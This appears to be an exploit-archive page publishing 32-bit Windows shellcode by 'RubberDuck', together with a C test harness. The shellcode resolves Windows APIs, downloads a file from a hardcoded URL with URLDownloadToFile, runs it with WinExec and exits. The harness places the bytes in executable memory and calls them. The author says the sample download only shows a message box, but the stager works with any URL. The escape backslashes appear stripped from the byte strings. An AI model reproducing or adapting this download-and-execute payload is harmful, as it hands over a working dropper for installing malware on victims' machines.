Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode
# Published : 2013-01-24
# Author :
# Previous Title : ARM Bindshell port 0x1337
# Next Title : BSD x86 portbind + fork shellcode (111 bytes)

/*
Title: Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode
Date: 2013-22-01
Author: RubberDuck
Web: http://bflow.security-portal.cz
     http://www.security-portal.cz
Tested on: Win 2k, Win XP Home SP2/SP3 CZ (32), Win 7 (32/64)
 -- file is downloaded from URL http://bflow.security-portal.cz/down/xy.txt
 -- xy.txt - http://www.virustotal.com/file/7d0d68f8e378d5aa29620c749f797d1d5fa05356fbf6f9ca64ba00f00fe86182/analysis/1358866648/
 -- xy.txt only shows MessageBox with text "Test application for Allwin URLDownloadToFile shellcode"
    and title ">> Author: RubberDuck - http://bflow.security-portal.cz <<"

 */

#include <windows.h>
#include <stdio.h>

int main(){
    unsigned char shellcode[] =
"x33xC9x64x8Bx41x30x8Bx40x0Cx8B"
"x70x14xADx96xADx8Bx58x10x8Bx53"
"x3Cx03xD3x8Bx52x78x03xD3x8Bx72"
"x20x03xF3x33xC9x41xADx03xC3x81"
"x38x47x65x74x50x75xF4x81x78x04"
"x72x6Fx63x41x75xEBx81x78x08x64"
"x64x72x65x75xE2x8Bx72x24x03xF3"
"x66x8Bx0Cx4Ex49x8Bx72x1Cx03xF3"
"x8Bx14x8Ex03xD3x33xC9x51x68x2E"
"x65x78x65x68x64x65x61x64x53x52"
"x51x68x61x72x79x41x68x4Cx69x62"
"x72x68x4Cx6Fx61x64x54x53xFFxD2"
"x83xC4x0Cx59x50x51x66xB9x6Cx6C"
"x51x68x6Fx6Ex2Ex64x68x75x72x6C"
"x6Dx54xFFxD0x83xC4x10x8Bx54x24"
"x04x33xC9x51x66xB9x65x41x51x33"
"xC9x68x6Fx46x69x6Cx68x6Fx61x64"
"x54x68x6Fx77x6Ex6Cx68x55x52x4C"
"x44x54x50xFFxD2x33xC9x8Dx54x24"
"x24x51x51x52xEBx47x51xFFxD0x83"
"xC4x1Cx33xC9x5Ax5Bx53x52x51x68"
"x78x65x63x61x88x4Cx24x03x68x57"
"x69x6Ex45x54x53xFFxD2x6Ax05x8D"
"x4Cx24x18x51xFFxD0x83xC4x0Cx5A"
"x5Bx68x65x73x73x61x83x6Cx24x03"
"x61x68x50x72x6Fx63x68x45x78x69"
"x74x54x53xFFxD2xFFxD0xE8xB4xFF"
"xFFxFF"
// http://bflow.security-portal.cz/down/xy.txt
"x68x74x74x70x3Ax2Fx2Fx62"
"x66x6Cx6Fx77x2Ex73x65x63x75x72"
"x69x74x79x2Dx70x6Fx72x74x61x6C"
"x2Ex63x7Ax2Fx64x6Fx77x6Ex2Fx78"
"x79x2Ex74x78x74x00";

    LPVOID lpAlloc = NULL;
    void (*pfunc)();

    lpAlloc = VirtualAlloc(0, 4096,
                           MEM_COMMIT,
                           PAGE_EXECUTE_READWRITE);

    if(lpAlloc == NULL){
        printf("Memory isn't allocated!n");
        return 0;
    }

    memcpy(lpAlloc, shellcode, lstrlenA((LPCSTR)shellcode) + 1);

    pfunc = (void (*)())lpAlloc;

    pfunc();

    return 0;
}